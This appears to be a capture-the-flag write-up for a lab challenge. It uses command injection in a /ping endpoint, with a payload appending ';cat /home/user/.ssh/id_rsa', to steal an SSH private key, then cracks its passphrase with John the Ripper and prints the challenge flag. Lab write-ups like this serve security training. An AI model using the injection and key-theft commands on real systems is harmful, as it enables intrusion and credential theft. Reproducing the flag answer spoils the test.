The Iron Shell - TOKEN2

Base URL: http://target:8000

Background

SSH is exposed on the target. The task is to recover valid SSH credentials using the provided wordlist and submit them to the grader.

From Nothing to Working

Start point: only the /ping entry point and a wordlist URL are provided.

Iterations:

1. Use /ping command injection to read user files and identify an SSH private key.
2. Extract the key (encrypted) and save it locally as id_rsa.
3. Convert the key to a John hash with ssh2john and crack it using the provided wordlist (with OMP_NUM_THREADS=16).
4. Submit the recovered username/password to http://grader/ and receive the token.

Goal

Crack SSH credentials and submit them to the grader.

Commands

Extract the key:

curl -s "http://target:8000/ping?ip=127.0.0.1;cat+/home/user/.ssh/id_rsa" > id_rsa
chmod 600 id_rsa

Crack the passphrase:

ssh2john id_rsa > id_rsa.john
OMP_NUM_THREADS=16 john --wordlist=wordlist.txt id_rsa.john

Submit to grader (use the cracked values):

curl -s -X POST http://grader/ \
  -d "username=USER" -d "password=PASS"

Expected Output

Look for:

PCCC{flag2_99_7478}

Learn More

• https://owasp.org/www-community/attacks/Password_cracking
• https://cwe.mitre.org/data/definitions/522.html